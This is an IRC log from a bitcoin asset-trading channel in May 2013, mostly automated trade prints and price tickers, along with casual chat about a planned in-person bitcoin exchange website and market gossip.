19:56:01 "they're probably trying to mellow me down so I don't think they're after me anymore" May 04 19:56:03 luke clearly isn't, and the effects are about the same give or take. May 04 19:56:05 [HAVELOCK] [HIM] 1 @ 1.999 BTC [+] May 04 19:56:06 or something along those lines May 04 20:05:05 [HAVELOCK] [KCIM] 1 @ 1.466 BTC [+] May 04 20:05:34 http://instagram.com/p/Y3ugC8QRGS/# this gut at google has moeny May 04 20:07:04 [HAVELOCK] [VTX] 1 @ 0.470444 BTC [-] May 04 20:08:12 [BTCTC] [ASICMINER-PT] 1 @ 1.24101 BTC [+] May 04 20:08:21 [BTCTC] [ASICMINER-PT] 1 @ 1.241 BTC [-] May 04 20:08:26 [BTCTC] [ASICMINER-PT] 1 @ 1.24 BTC [-] May 04 20:08:35 ;;genrate 300 May 04 20:08:36 [BTCTC] [ASICMINER-PT] 1 @ 1.222 BTC [-] May 04 20:08:40 The expected generation output, at 300.0 Mhps, given difficulty of 10076292.8834, is 0.0149729624451 BTC per day and 0.000623873435212 BTC per hour. May 04 20:08:40 [BTCTC] [ASICMINER-PT] 1 @ 1.22 BTC [-] May 04 20:08:50 [BTCTC] [ASICMINER-PT] 2 @ 1.22 = 2.44 BTC [-] May 04 20:08:55 [BTCTC] [ASICMINER-PT] 2 @ 1.2061 = 2.4122 BTC [-] May 04 20:09:00 [BTCTC] [ASICMINER-PT] 8 @ 1.20607 = 9.6486 BTC [-] May 04 20:09:06 [HAVELOCK] [HIM] 10 @ 2 = 20 BTC [+] May 04 20:09:14 [BTCTC] [ASICMINER-PT] 1 @ 1.20604 BTC [-] May 04 20:09:20 [BTCTC] [ASICMINER-PT] 3 @ 1.206 = 3.618 BTC [-] May 04 20:09:25 [BTCTC] [ASICMINER-PT] 2 @ 1.205 = 2.41 BTC [-] May 04 20:09:30 [BTCTC] [ASICMINER-PT] 3 @ 1.2045 = 3.6135 BTC [-] May 04 20:09:37 [BTCTC] [ASICMINER-PT] 3 @ 1.204 = 3.612 BTC [-] May 04 20:09:55 hmm May 04 20:09:58 [BTCTC] [ASICMINER-PT] 1 @ 1.202 BTC [-] May 04 20:11:28 [BTCTC] [BTC-BOND] 1 @ 0.01 BTC [+] May 04 20:11:44 [BTCTC] [BTC-BOND] 11 @ 0.00999 = 0.1099 BTC [-] May 04 20:16:09 [BTCTC] [BTC-BOND] 12 @ 0.00999 = 0.1199 BTC [-] May 04 20:16:18 [BTCTC] [BTC-BOND] 20 @ 0.0101 = 0.202 BTC [+] May 04 20:17:54 [BTCTC] [BTC-BOND] 12 @ 0.00999 = 0.1199 BTC [-] May 04 20:19:35 [BTCTC] [BTC-BOND] 12 @ 0.00999 = 0.1199 BTC [-] May 04 20:20:49 ;;estimate May 04 20:20:50 Next difficulty estimate | 10284303.1574 based on data since last change | 10255155.5813 based on data for last three days May 04 20:21:14 ;;genrate 300 10284303.1574 May 04 20:21:15 The expected generation output, at 300.0 Mhps, given difficulty of 10284303.1574, is 0.0146701193674 BTC per day and 0.00061125497364 BTC per hour. May 04 20:23:22 so basically the silk road ddos clearly proves that my suspicion was correct last month May 04 20:23:33 and tor is not actually strong enough to withstand the sort of ddos we;'ve been seeing May 04 20:32:03 your suspicion being ? May 04 20:34:51 that tor can't take it. May 04 20:50:56 [MPEX] [S.MPOE] 5000 @ 0.00068918 = 3.4459 BTC [-] May 04 20:57:05 [HAVELOCK] [VTX] 1 @ 0.4772001 BTC [+] May 04 20:57:07 [HAVELOCK] [VTX] 5 @ 0.4773 = 2.3865 BTC [+] May 04 21:00:06 [HAVELOCK] [VTX] 1 @ 0.477316 BTC [+] May 04 21:10:14 [BTCTC] [COGNITIVE] 4 @ 0.25002 = 1.0001 BTC [+] May 04 21:10:24 [BTCTC] [COGNITIVE] 1 @ 0.25 BTC [-] May 04 21:10:33 [BTCTC] [COGNITIVE] 3 @ 0.24005 = 0.7202 BTC [-] May 04 21:10:48 [MPEX] [S.MPOE] 2600 @ 0.00068918 = 1.7919 BTC [-] May 04 21:12:51 [BTCTC] [BASIC-MINING] 1 @ 0.411 BTC [+] May 04 21:12:54 [BTCTC] [BASIC-MINING] 2 @ 0.41 = 0.82 BTC [-] May 04 21:13:52 [MPEX] [S.DICE] 950 @ 0.00316483 = 3.0066 BTC [+] May 04 21:14:45 [BTCTC] [BTC-BOND] 1 @ 0.01 BTC [+] May 04 21:14:54 [BTCTC] [BTC-BOND] 42 @ 0.00999 = 0.4196 BTC [-] May 04 21:14:57 [BTCTC] [BTC-BOND] 35 @ 0.00999 = 0.3497 BTC [-] May 04 21:15:01 [BTCTC] [BTC-BOND] 1 @ 0.00999 BTC [-] May 04 21:15:05 [BTCTC] [BTC-BOND] 56 @ 0.00999 = 0.5594 BTC [-] May 04 21:22:26 [MPEX] [O.USD.C104T] 615 @ 0.36055278 = 221.74 BTC [-] May 04 21:22:47 $avg May 04 21:22:49 ThickAsThieves: 103.47 May 04 21:40:06 [HAVELOCK] [VTX] 4 @ 0.477316 = 1.9093 BTC [+] May 04 21:49:06 [HAVELOCK] [SDICE] 1 @ 0.29000001 BTC [-] May 04 21:56:06 [HAVELOCK] [VTX] 1 @ 0.48411214 BTC [+] May 04 21:59:44 https://bitcointalk.org/index.php?topic=195110.msg2028235#msg2028235 girl delivers May 04 22:03:06 [HAVELOCK] [KCIM] 1 @ 1.2101 BTC [-] May 04 22:11:27 [BTCTC] [ASICMINER-PT] 1 @ 1.25799 BTC [+] May 04 22:25:15 [BTCTC] [PAJKA.BOND] 29 @ 0.1089 = 3.1581 BTC [+] May 04 22:30:28 [MPEX] [S.MPOE] 9150 @ 0.00069036 = 6.3168 BTC [+] May 04 22:44:20 ??seen bugpowder May 04 22:44:27 tiberiusiv!*@* added to ignore list. May 04 22:44:41 bugpowder was last seen in #bitcoin-assets 1 day, 0 hours, 14 minutes, and 38 seconds ago: I was 3-4 yr old May 04 22:46:14 BTCUSD ticker | Best bid: 110.70100, Best ask: 111.25000, Bid-ask spread: 0.54900, Last trade: 111.25000, 24 hour volume: 142006.40407464, 24 hour low: 90.03100, 24 hour high: 116.30000, 24 hour vwap: 103.98814 May 04 22:46:25 There are currently 143870.47 bitcoins demanded at or over 50.0 USD, worth 10391555.4417 USD in total. | Data vintage: 3786.2619 seconds May 04 22:46:56 There are currently 115318.46 bitcoins offered at or under 200.0 USD, worth 17121909.1601 USD in total. | Data vintage: 0.0099 seconds May 04 22:47:06 There are currently 70040.443 bitcoins offered at or under 150.0 USD, worth 9390711.40061 USD in total. | Data vintage: 10.4105 seconds May 04 22:47:16 There are currently 3.4466162e+08 bitcoins demanded at or over 0.0 USD, worth 16464162.8317 USD in total. | Data vintage: 19.0413 seconds May 04 22:58:02 [BTCTC] [RSM] 3 @ 0.005 = 0.015 BTC [-] May 04 22:59:40 [BTCTC] [BTC-BOND] 2 @ 0.0101 = 0.0202 BTC [+] May 04 23:02:53 [BTCTC] [GSDPT] 2 @ 0.0032 = 0.0064 BTC [-] May 04 23:43:24 [BTCTC] [PAJKA.BOND] 10 @ 0.1089 = 1.089 BTC [+] May 04 23:46:22 [BTCTC] [BTC-BOND] 2 @ 0.0101 = 0.0202 BTC [+] May 04 23:58:07 [HAVELOCK] [VTX] 10 @ 0.489499 = 4.895 BTC [+] May 05 00:00:06 [HAVELOCK] [VTX] 1 @ 0.4896999 BTC [+] May 05 00:00:54 $vwap ^OIX May 05 00:00:56 mod6: ^OIX 1 day: no data 7 day: average: 101.03478931 high: 176.8359807 low: 72.06529631 volume: 4108 btc: 1489.44468256 30 day: no data May 05 00:02:07 [HAVELOCK] [VTX] 1 @ 0.492 BTC [+] May 05 00:03:07 [HAVELOCK] [VTX] 2 @ 0.492 = 0.984 BTC [+] May 05 00:11:50 [BTCTC] [PAJKA.BOND] 10 @ 0.1089 = 1.089 BTC [+] May 05 00:17:36 [MPEX] [S.DICE] 172 @ 0.003388 = 0.5827 BTC [+] May 05 00:23:29 [BTCTC] [PAJKA.BOND] 1 @ 0.1089 BTC [+] May 05 00:40:38 [BTCTC] [PAJKA.BOND] 1 @ 0.1089 BTC [+] May 05 00:41:23 [BTCTC] [CRYPTO-TRADE] 1 @ 0.15007 BTC [-] May 05 00:42:23 [BTCTC] [CRYPTO-TRADE] 2 @ 0.15006 = 0.3001 BTC [-] May 05 00:43:27 [BTCTC] [CRYPTO-TRADE] 1 @ 0.15 BTC [-] May 05 00:44:20 [BTCTC] [BTC-BOND] 25 @ 0.0101 = 0.2525 BTC [+] May 05 00:45:28 [BTCTC] [LTC-MINING] 1 @ 0.41 BTC [+] May 05 00:48:18 [BTCTC] [PAJKA.BOND] 5 @ 0.1089 = 0.5445 BTC [+] May 05 00:49:28 [BTCTC] [S.MPOE-PT] 145 @ 0.000689 = 0.0999 BTC [+] May 05 00:49:41 [BTCTC] [S.MPOE-PT] 190 @ 0.000692 = 0.1315 BTC [+] May 05 00:49:45 [BTCTC] [S.MPOE-PT] 10 @ 0.000698 = 0.007 BTC [+] May 05 00:49:59 [BTCTC] [S.MPOE-PT] 10 @ 0.000698 = 0.007 BTC [+] May 05 00:50:06 [BTCTC] [S.MPOE-PT] 95 @ 0.000699 = 0.0664 BTC [+] May 05 00:54:16 [BTCTC] [BTC-BOND] 1 @ 0.01 BTC [-] May 05 00:54:19 [BTCTC] [BTC-BOND] 24 @ 0.00999 = 0.2398 BTC [-] May 05 00:55:14 hi all May 05 00:55:22 i am starting a project right now May 05 00:55:22 hey May 05 00:55:29 project buttonwood May 05 00:55:31 [BTCTC] [BTC-BOND] 25 @ 0.00999 = 0.2498 BTC [-] May 05 00:55:51 basically a website which will try to facilitate IRL bitcoin exchanges May 05 00:56:10 easy to use level 2 book, maybe geolocation features May 05 00:56:18 very simple to use May 05 00:56:50 so hopefully anyone anywhere can just say "me meet at location x at time y" and then they have an order book for advertising prices May 05 00:57:04 i'm going to hopefully try it out in a park in new york on monday May 05 00:57:10 so 2 day hackathon lol May 05 00:57:29 [BTCTC] [LTC-MINING] 1 @ 0.34 BTC [-] May 05 00:57:56 i hope that we can get distributed and decentralized exchanges that will be easy to use May 05 00:59:10 any comments or suggestions? May 05 01:00:13 sorta like localbitcoin ? May 05 01:00:49 well, yes, similar but in some ways completely different May 05 01:00:55 localbitcoin is for finding people May 05 01:01:09 so, it basically assumes that you will coordinate amongst yourself May 05 01:01:18 this is meant for a group of people in the same location at the same time May 05 01:01:37 an easy way of all keeping track of what orders you have out etc May 05 01:01:56 basically, a website optimized for a mobile device, where you can update your orders quickly May 05 01:01:57 aha May 05 01:02:04 so api ? May 05 01:02:07 [BTCTC] [S.MPOE-PT] 3 @ 0.00064 = 0.0019 BTC [-] May 05 01:02:12 [BTCTC] [S.MPOE-PT] 80 @ 0.000636 = 0.0509 BTC [-] May 05 01:02:21 [BTCTC] [S.MPOE-PT] 20 @ 0.000625 = 0.0125 BTC [-] May 05 01:02:24 should have API, but at the same time...it is cash settled immediateely May 05 01:02:24 [BTCTC] [S.MPOE-PT] 5 @ 0.000625 = 0.0031 BTC [-] May 05 01:02:27 [BTCTC] [S.MPOE-PT] 10 @ 0.00061 = 0.0061 BTC [-] May 05 01:02:29 so bots can't really do well May 05 01:02:37 [BTCTC] [S.MPOE-PT] 332 @ 0.000606 = 0.2012 BTC [-] May 05 01:02:42 we are not clearing or settling May 05 01:02:46 that is entirely p2p May 05 01:02:54 for example: May 05 01:03:08 i have maybe 20 people meeting in union square on monday at 4pm May 05 01:03:23 i want to give them a site where they can advertise their prices May 05 01:03:37 as well as update those prices in basically real time May 05 01:03:48 [BTCTC] [BTC-BOND] 50 @ 0.0101 = 0.505 BTC [+] May 05 01:03:57 so as people join us in the park, they know our local best bid and ask May 05 01:04:07 and they can place an order in front of it if they want May 05 01:04:17 but if you find someone, you "match" in real life May 05 01:04:27 not using the website May 05 01:04:47 i might place a "hold" feature on the site, so you can show that someone is taking an offer or a bid May 05 01:05:07 [BTCTC] [BTC-BOND] 50 @ 0.00999 = 0.4995 BTC [-] May 05 01:05:12 it will also convert all orders into denomminations of $10 or $20 May 05 01:05:18 since change is a hassle in fiat May 05 01:05:31 so $20 = x bitcoins May 05 01:06:26 hopefully then, when people update their order to show that they have closed a sale, it will generate a print on our tape May 05 01:06:31 [BTCTC] [BTC-BOND] 50 @ 0.00999 = 0.4995 BTC [-] May 05 01:06:32 so we will have market data May 05 01:07:02 basically it is trying to maintain a level 2 book in real time synched across 20 mobile devices May 05 01:07:21 [BTCTC] [BTC-BOND] 50 @ 0.0101 = 0.505 BTC [+] May 05 01:07:23 going to use what is called a MEAN stack May 05 01:07:34 mongodb, express, angularjs, nodejs May 05 01:07:50 hm May 05 01:07:59 should be very easy to implement, so if philadelphians or chicagoans want to duplicate it, they could easily May 05 01:08:03 well document how it works irl. May 05 01:08:15 yes of course May 05 01:08:20 [BTCTC] [BTC-BOND] 50 @ 0.00999 = 0.4995 BTC [-] May 05 01:08:22 not one line of code written yet May 05 01:08:28 but i think i can have it up by monday May 05 01:08:50 simply a tool, to help facilitate real life transactions May 05 01:09:22 [BTCTC] [BTC-BOND] 50 @ 0.00999 = 0.4995 BTC [-] May 05 01:10:12 i think version 1 will be rough, but then we can add geolocation, so if someone isn't there, their orders will be grayed out (as they couldn't be acted upon anywy) May 05 01:11:20 [BTCTC] [BTC-BOND] 200 @ 0.0101 = 2.02 BTC [+] May 05 01:13:07 [BTCTC] [BTC-BOND] 200 @ 0.00999 = 1.998 BTC [-] May 05 01:14:29 [BTCTC] [BTC-BOND] 131 @ 0.00999 = 1.3087 BTC [-] May 05 01:15:14 repo in public? May 05 01:17:31 [BTCTC] [BTC-BOND] 330 @ 0.0101 = 3.333 BTC [+] May 05 01:18:44 [BTCTC] [BTC-BOND] 14 @ 0.00999 = 0.1399 BTC [-] May 05 01:18:53 [BTCTC] [BTC-BOND] 1 @ 0.00999 BTC [-] May 05 01:18:58 [BTCTC] [BTC-BOND] 100 @ 0.00998 = 0.998 BTC [-] May 05 01:19:01 [BTCTC] [BTC-BOND] 1 @ 0.00998 BTC [-] May 05 01:19:04 [BTCTC] [BTC-BOND] 100 @ 0.00997 = 0.997 BTC [-] May 05 01:19:08 [BTCTC] [BTC-BOND] 1 @ 0.00997 BTC [-] May 05 01:19:24 [BTCTC] [BTC-BOND] 100 @ 0.00996 = 0.996 BTC [-] May 05 01:19:28 [BTCTC] [BTC-BOND] 3 @ 0.00996 = 0.0299 BTC [-] May 05 01:19:31 [BTCTC] [BTC-BOND] 1 @ 0.00996 BTC [-] May 05 01:19:46 benkay: i just pushed out an updated readme May 05 01:19:48 its on github May 05 01:19:57 i am going to start by setting up the node.js server May 05 01:21:27 [BTCTC] [BTC-BOND] 320 @ 0.0101 = 3.232 BTC [+] May 05 01:22:27 [BTCTC] [BTC-BOND] 100 @ 0.00995 = 0.995 BTC [-] May 05 01:22:30 [BTCTC] [BTC-BOND] 5 @ 0.00995 = 0.0498 BTC [-] May 05 01:22:40 [BTCTC] [BTC-BOND] 1 @ 0.00995 BTC [-] May 05 01:22:43 [BTCTC] [BTC-BOND] 10 @ 0.00994 = 0.0994 BTC [-] May 05 01:22:46 [BTCTC] [BTC-BOND] 1 @ 0.00993 BTC [-] May 05 01:22:51 [BTCTC] [BTC-BOND] 10 @ 0.00993 = 0.0993 BTC [-] May 05 01:22:55 [BTCTC] [BTC-BOND] 5 @ 0.00992 = 0.0496 BTC [-] May 05 01:22:58 [BTCTC] [BTC-BOND] 10 @ 0.00992 = 0.0992 BTC [-] May 05 01:23:02 [BTCTC] [BTC-BOND] 10 @ 0.00991 = 0.0991 BTC [-] May 05 01:23:05 [BTCTC] [BTC-BOND] 10 @ 0.00991 = 0.0991 BTC [-] May 05 01:23:08 [BTCTC] [BTC-BOND] 21 @ 0.009906 = 0.208 BTC [-] May 05 01:23:18 [BTCTC] [BTC-BOND] 10 @ 0.009902 = 0.099 BTC [-] May 05 01:23:28 [BTCTC] [BTC-BOND] 20 @ 0.0099 = 0.198 BTC [-] May 05 01:23:31 [BTCTC] [BTC-BOND] 10 @ 0.0099 = 0.099 BTC [-] May 05 01:23:35 [BTCTC] [BTC-BOND] 20 @ 0.00985 = 0.197 BTC [-] May 05 01:23:44 [BTCTC] [BTC-BOND] 86 @ 0.00981 = 0.8437 BTC [-] May 05 01:24:46 theres the pirate bay May 05 01:24:52 theres the silk road May 05 01:25:23 [BTCTC] [BTC-BOND] 300 @ 0.0101 = 3.03 BTC [+] May 05 01:25:25 what other geographical features can we name dumb shit after? May 05 01:25:28 I mean, whats next, porn mountain? May 05 01:25:46 one can only hope May 05 01:25:57 next is diablo mining center May 05 01:26:26 [BTCTC] [BTC-BOND] 179 @ 0.00981 = 1.756 BTC [-] May 05 01:26:47 kakobrekla: meh, mining has already end gamed itself May 05 01:27:09 bfl is not shipping 65nm, avalon is already working on 65nm, and asicminer is working on *redacted* May 05 01:27:15 and i selfsmarted myself May 05 01:27:39 kakobrekla https://bitcointalk.org/index.php?topic=186185.msg2026892#msg2026892 May 05 01:27:43 there, have a tortilla May 05 01:27:45 [BTCTC] [BTC-BOND] 6 @ 0.0098 = 0.0588 BTC [-] May 05 01:27:48 so instead of mining, Im working o something even greater May 05 01:28:30 mircea_popescu: rhyming slang makes zero sense to me May 05 01:28:35 must be an accent thing May 05 01:28:48 seriously ? May 05 01:29:03 none of it rhymes. May 05 01:29:07 [BTCTC] [BTC-BOND] 7 @ 0.00979 = 0.0685 BTC [-] May 05 01:29:09 i always thought it's one of the few redeeming features of the engluish language May 05 01:29:10 [BTCTC] [BTC-BOND] 1 @ 0.009782 BTC [-] May 05 01:29:18 [BTCTC] [BTC-BOND] 2 @ 0.009767 = 0.0195 BTC [-] May 05 01:29:21 [BTCTC] [BTC-BOND] 105 @ 0.00976 = 1.0248 BTC [-] May 05 01:29:43 its a sad thread May 05 01:31:07 [BTCTC] [BTC-BOND] 300 @ 0.0101 = 3.03 BTC [+] May 05 01:31:09 yeah May 05 01:32:01 [BTCTC] [BTC-BOND] 262 @ 0.00976 = 2.5571 BTC [-] May 05 01:32:12 [BTCTC] [BTC-BOND] 38 @ 0.00976 = 0.3709 BTC [-] May 05 01:34:12 mircea_popescu: by the way, the facebook comment i directed you too was very sad May 05 01:34:20 the guy was like, we should all coordinate a fixed price May 05 01:34:27 i was like i completely disagree with you May 05 01:34:37 [BTCTC] [ASICMINER-PT] 1 @ 1.24499 BTC [-] May 05 01:34:39 that is a retarded idea May 05 01:34:48 since anyone can simply jump in front anyway May 05 01:34:56 why bother trying to control everyone? May 05 01:35:20 free market apparently is like phd level stuff or something May 05 01:35:30 though i think toddlers understand it quite well May 05 01:35:53 i blame the school system. May 05 01:37:32 mjr, link? May 05 01:42:54 https://www.facebook.com/groups/BitcoinNYC/ May 05 01:43:01 adrian childers comment May 05 01:43:40 market drop please :D May 05 01:43:54 im bored, just counting my fingers waiting to drop in May 05 01:44:07 why not do something useful instead. May 05 01:44:22 i can't. i'm engrossed in bitcoin at the moment :P May 05 01:45:25 i went to the gym and then left early to go look at clark moody graph just sit there at 113. sad thing it my mind is telling me, "worth it" May 05 01:45:56 [BTCTC] [BTC-BOND] 35 @ 0.0101 = 0.3535 BTC [+] May 05 01:45:57 heh May 05 01:45:59 I just realized May 05 01:46:00 mt gox May 05 01:46:07 pirate bay, silk road, mt gox May 05 01:46:13 we need some sort of river or something May 05 01:46:58 [BTCTC] [BTC-BOND] 35 @ 0.00976 = 0.3416 BTC [-] May 05 01:49:52 [BTCTC] [PAJKA.BOND] 3 @ 0.1089 = 0.3267 BTC [+] May 05 01:51:09 [BTCTC] [PAJKA.BOND] 1 @ 0.1077 BTC [-] May 05 01:51:22 [BTCTC] [PAJKA.BOND] 1 @ 0.1075 BTC [-] May 05 01:51:27 [BTCTC] [PAJKA.BOND] 1 @ 0.1011 BTC [-] May 05 01:53:21 i guess bitriver is imminent May 05 01:54:04 or a valley May 05 01:54:12 and no, you cant name it the river tam May 05 01:54:58 [BTCTC] [PAJKA.BOND] 1 @ 0.1011 BTC [-] May 05 01:55:02 [BTCTC] [PAJKA.BOND] 2 @ 0.100001 = 0.2 BTC [-] May 05 01:57:24 [BTCTC] [PAJKA.BOND] 1 @ 0.100001 BTC [-] May 05 01:58:56 [BTCTC] [PAJKA.BOND] 7 @ 0.1089 = 0.7623 BTC [+] May 05 02:00:06 [BTCTC] [PAJKA.BOND] 7 @ 0.100001 = 0.7 BTC [-] May 05 02:02:23 [BTCTC] [COGNITIVE] 2 @ 0.29635 = 0.5927 BTC [+] May 05 02:03:24 [BTCTC] [COGNITIVE] 2 @ 0.24005 = 0.4801 BTC [-] May 05 02:04:39 [BTCTC] [COGNITIVE] 2 @ 0.24005 = 0.4801 BTC [-] May 05 02:06:03 [BTCTC] [COGNITIVE] 1 @ 0.29636 BTC [+] May 05 02:06:19 [BTCTC] [COGNITIVE] 2 @ 0.29894 = 0.5979 BTC [+] May 05 02:06:59 jurovvvvvv May 05 02:07:08 coinbr has issues May 05 02:09:16 [BTCTC] [COGNITIVE] 2 @ 0.22503 = 0.4501 BTC [-] May 05 02:09:19 [BTCTC] [COGNITIVE] 1 @ 0.22502 BTC [-] May 05 02:11:06 [BTCTC] [COGNITIVE] 1 @ 0.225 BTC [-] May 05 02:11:21 he prolly doesn't ding unless you use the actual name May 05 02:11:55 already pm'd earlier :/ May 05 02:12:18 jurov ^ May 05 02:12:56 audit of transactions doesn't match quantities held in account May 05 02:13:28 [BTCTC] [S.DICE-PT] 22 @ 0.0032 = 0.0704 BTC [-] May 05 02:13:40 [BTCTC] [S.DICE-PT] 278 @ 0.0033 = 0.9174 BTC [+] May 05 02:14:38 [BTCTC] [S.DICE-PT] 40 @ 0.00301 = 0.1204 BTC [-] May 05 02:14:41 [BTCTC] [S.DICE-PT] 5 @ 0.003 = 0.015 BTC [-] May 05 02:14:51 [BTCTC] [S.DICE-PT] 102 @ 0.00286 = 0.2917 BTC [-] May 05 02:15:06 [BTCTC] [S.DICE-PT] 85 @ 0.00285 = 0.2423 BTC [-] May 05 02:15:17 [BTCTC] [S.DICE-PT] 6 @ 0.00285 = 0.0171 BTC [-] May 05 02:15:29 [BTCTC] [S.DICE-PT] 62 @ 0.00285 = 0.1767 BTC [-] May 05 02:16:43 [BTCTC] [S.DICE-PT] 300 @ 0.002851 = 0.8553 BTC [+] May 05 02:17:37 ThickAsThieves exercises perhaps ? May 05 02:17:40 no s.dice divs yet? May 05 02:18:12 its on SDICE May 05 02:18:19 Yeah, there was already divs May 05 02:18:19 mp ^ May 05 02:18:45 [MPEX] [S.DICE] 6 @ 0.00300001 = 0.018 BTC [-] May 05 02:18:47 [MPEX] [S.DICE] 294 @ 0.003 = 0.882 BTC [-] May 05 02:19:11 When I sell SDICE, it doesnt show up May 05 02:19:15 nor does the btc May 05 02:19:25 [BTCTC] [S.DICE-PT] 113 @ 0.002851 = 0.3222 BTC [+] May 05 02:19:28 but the sale goes thru May 05 02:20:07 odd May 05 02:20:14 [MPEX] [S.DICE] 113 @ 0.003 = 0.339 BTC [-] May 05 02:20:27 mjr___ yeah, it beat by about 1%. like 3570 per share irrc May 05 02:20:28 [BTCTC] [ASICMINER-PT] 1 @ 1.244846 BTC [-] May 05 02:20:52 it might be related to how he imported shares for me recently May 05 02:21:17 but the discrepency might be older than that May 05 02:21:19 working on it May 05 02:21:21 [BTCTC] [ASICMINER-PT] 1 @ 1.19103 BTC [-] May 05 02:22:39 [BTCTC] [ASICMINER-PT] 1 @ 1.19102 BTC [-] May 05 02:23:50 [BTCTC] [ASICMINER-PT] 1 @ 1.244836 BTC [+] May 05 02:25:50 [BTCTC] [ASICMINER-PT] 2 @ 1.25699 = 2.514 BTC [+] May 05 02:26:41 [BTCTC] [ASICMINER-PT] 1 @ 1.190031 BTC [-] May 05 02:26:50 [BTCTC] [ASICMINER-PT] 1 @ 1.19003 BTC [-] May 05 02:28:23 [BTCTC] [ASICMINER-PT] 2 @ 1.19 = 2.38 BTC [-] May 05 02:29:51 [BTCTC] [ASICMINER-PT] 1 @ 1.19001 BTC [+] May 05 02:29:53 [BTCTC] [ASICMINER-PT] 1 @ 1.19 BTC [-] May 05 02:31:13 [BTCTC] [ASICMINER-PT] 2 @ 1.185 = 2.37 BTC [-] May 05 02:32:18 [BTCTC] [ASICMINER-PT] 1 @ 1.256957 BTC [+] May 05 02:32:35 [BTCTC] [ASICMINER-PT] 1 @ 1.256958 BTC [+] May 05 02:32:42 [BTCTC] [ASICMINER-PT] 1 @ 1.257 BTC [+] May 05 02:32:49 [BTCTC] [ASICMINER-PT] 6 @ 1.257769 = 7.5466 BTC [+] May 05 02:34:14 [BTCTC] [ASICMINER-PT] 1 @ 1.257 BTC [-] May 05 02:34:26 [BTCTC] [ASICMINER-PT] 1 @ 1.185001 BTC [-] May 05 02:34:29 [BTCTC] [ASICMINER-PT] 1 @ 1.185 BTC [-] May 05 02:34:39 [BTCTC] [ASICMINER-PT] 3 @ 1.161 = 3.483 BTC [-] May 05 02:34:43 [BTCTC] [ASICMINER-PT] 1 @ 1.1602 BTC [-] May 05 02:34:48 [BTCTC] [ASICMINER-PT] 1 @ 1.1501 BTC [-] May 05 02:34:52 lots of traffic today May 05 02:36:27 [BTCTC] [ASICMINER-PT] 2 @ 1.2 = 2.4 BTC [+] May 05 02:36:36 [BTCTC] [ASICMINER-PT] 3 @ 1.15 = 3.45 BTC [-] May 05 02:36:42 [BTCTC] [ASICMINER-PT] 1 @ 1.14 BTC [-] May 05 02:36:46 [BTCTC] [ASICMINER-PT] 2 @ 1.13 = 2.26 BTC [-] May 05 02:40:22 [BTCTC] [ASICMINER-PT] 1 @ 1.13001 BTC [+] May 05 02:40:49 [BTCTC] [ASICMINER-PT] 7 @ 1.13 = 7.91 BTC [-] May 05 02:42:36 [BTCTC] [ASICMINER-PT] 1 @ 1.132 BTC [+] May 05 02:42:39 [BTCTC] [ASICMINER-PT] 1 @ 1.13001 BTC [-] May 05 02:42:43 [BTCTC] [ASICMINER-PT] 1 @ 1.13 BTC [-] May 05 02:42:49 [BTCTC] [ASICMINER-PT] 5 @ 1.12 = 5.6 BTC [-] May 05 02:43:20 mircea_popescu: May 05 02:43:23 are you around? May 05 02:43:59 [BTCTC] [ASICMINER-PT] 1 @ 1.1999 BTC [+] May 05 02:44:04 [BTCTC] [ASICMINER-PT] 1 @ 1.25774 BTC [+] May 05 02:44:12 [BTCTC] [ASICMINER-PT] 1 @ 1.257739 BTC [-] May 05 02:44:27 [BTCTC] [ASICMINER-PT] 1 @ 1.19989 BTC [-] May 05 02:44:34 [BTCTC] [ASICMINER-PT] 1 @ 1.256 BTC [+] May 05 02:44:42 [BTCTC] [ASICMINER-PT] 6 @ 1.257769 = 7.5466 BTC [+] May 05 02:44:48 [BTCTC] [ASICMINER-PT] 1 @ 1.25779 BTC [+] May 05 02:45:00 [BTCTC] [ASICMINER-PT] 5 @ 1.258949 = 6.2947 BTC [+] May 05 02:45:13 [BTCTC] [ASICMINER-PT] 9 @ 1.258989 = 11.3309 BTC [+] May 05 02:47:23 [BTCTC] [ASICMINER-PT] 1 @ 1.12102 BTC [-] May 05 02:47:29 [BTCTC] [ASICMINER-PT] 1 @ 1.12101 BTC [-] May 05 02:47:32 [BTCTC] [ASICMINER-PT] 1 @ 1.121 BTC [-] May 05 02:47:41 [BTCTC] [ASICMINER-PT] 10 @ 1.121 = 11.21 BTC [-] May 05 02:47:51 [BTCTC] [ASICMINER-PT] 13 @ 1.12 = 14.56 BTC [-] May 05 02:49:04 [BTCTC] [ASICMINER-PT] 1 @ 1.121011 BTC [+] May 05 02:49:09 [BTCTC] [ASICMINER-PT] 25 @ 1.12 = 28 BTC [-] May 05 02:51:05 ;;ticker May 05 02:51:06 BTCUSD ticker | Best bid: 112.80000, Best ask: 112.99899, Bid-ask spread: 0.19899, Last trade: 112.80000, 24 hour volume: 135032.52485955, 24 hour low: 92.00000, 24 hour high: 116.30000, 24 hour vwap: 106.49430 May 05 02:53:29 ya May 05 02:56:12 wtf is up with this fontas guy he's stirring up a lot of ..shit. May 05 02:56:32 wouldnt be suprised if there were angry mobs with pitchforks forming. May 05 02:56:37 fontas ? May 05 02:56:45 sec May 05 02:57:13 https://twitter.com/fontase/ May 05 02:57:24 some alt coin noob. May 05 02:58:55 he's got 2K followers and at this point seems like he's fucking with a lot of people May 05 03:02:05 for all icare... May 05 03:04:33 mircea_popescu: see pm real quick May 05 03:40:56 ok, good enough May 05 03:40:58 http://log.bitcoin-assets.com/ May 05 03:46:27 very nice May 05 03:51:10 all hail fontase May 05 03:53:00 coolness kakobrekla May 05 04:07:48 [MPEX] [S.MPOE] 1200 @ 0.00069036 = 0.8284 BTC [+] May 05 04:11:38 [MPEX] [S.MPOE] 10600 @ 0.00069468 = 7.3636 BTC [+] May 05 04:33:09 [BTCTC] [ASICMINER-PT] 1 @ 1.25692 BTC [+] May 05 04:38:31 ;;ticker May 05 04:38:32 BTCUSD ticker | Best bid: 112.11100, Best ask: 113.00000, Bid-ask spread: 0.88900, Last trade: 112.10001, 24 hour volume: 125480.73650669, 24 hour low: 92.99000, 24 hour high: 116.30000, 24 hour vwap: 107.54937 May 05 04:40:42 ;;next May 05 04:40:43 currently awaiting retracement to test 100-105 | lower targets: 104, 94 | upper targets: 120-123, 130 | updated by OneFixt at May 4 2013, 21:20 UTC ( tips: http://bit.ly/YnxUM4 ) | disclaimer: http://bit.ly/129bYJ6 | this is not investment or trading advice | #bitcoin-analysis | 4 hours, 20 minutes, and 34 seconds ago May 05 05:04:46 look at mtgo May 05 05:04:49 its going crazy May 05 05:04:56 ;;ticker May 05 05:04:57 BTCUSD ticker | Best bid: 117.01000, Best ask: 117.06000, Bid-ask spread: 0.05000, Last trade: 117.01000, 24 hour volume: 129990.03216512, 24 hour low: 92.99000, 